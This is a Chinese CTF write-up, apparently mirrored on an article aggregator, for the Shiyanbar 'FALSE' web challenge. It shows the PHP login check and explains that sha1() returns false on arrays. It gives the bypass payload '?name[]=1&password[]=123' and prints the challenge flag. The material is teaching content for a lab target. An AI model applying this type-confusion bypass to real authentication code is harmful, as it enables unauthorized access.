实验吧-FALSE

作者: V0W | 来源:发表于2018-08-08 16:34 被阅读0次

实验吧-FALSE
实验吧web-false
实验吧 Web-False
实验吧web-FALSE
实验吧-web-FALSE
true && true || false && false =
【Python爬虫】-第四期课后练习6
Java笔试题解（1）
图片上传ajax配置
实验吧-Forms

FALSE

原题链接

http://ctf5.shiyanbar.com/web/false.php

分析

<?php
if (isset($_GET['name']) and isset($_GET['password'])) {
    if ($_GET['name'] == $_GET['password'])
        echo '<p>Your password can not be your name!</p>';
    else if (sha1($_GET['name']) === sha1($_GET['password']))
      die('Flag: '.$flag);
    else
        echo '<p>Invalid password.</p>';
}
else{
    echo '<p>Login first!</p>';
?>

注意到源码是三等号，不能用弱类型判断

<?php
    var_dump(sha1('aaroZmOk')===sha1('aaK1STfY'));      //bool(false)
    var_dump(sha1('aaroZmOk')==sha1('aaK1STfY'));       //bool(true)
?>

应该利用false===false

md5 和 sha1 无法处理数组，但是 php 没有抛出异常，直接返回 fasle

sha1([]) === false
md5([]) === false

payload

?name[]=1&password[]=123

flag

CTF{t3st_th3_Sha1}

知识点

md5，sha1不能处理数组，抛出false

网友评论

本文标题：实验吧-FALSE

本文链接：https://www.haomeiwen.com/subject/qasxbftx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

实验吧-FALSE

FALSE

原题链接

分析

flag

知识点

相关文章

实验吧-FALSE

实验吧web-false

实验吧 Web-False

实验吧web-FALSE

实验吧-web-FALSE

true && true || false && false =

【Python爬虫】-第四期课后练习6

Java笔试题解（1）

图片上传ajax配置

实验吧-Forms

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读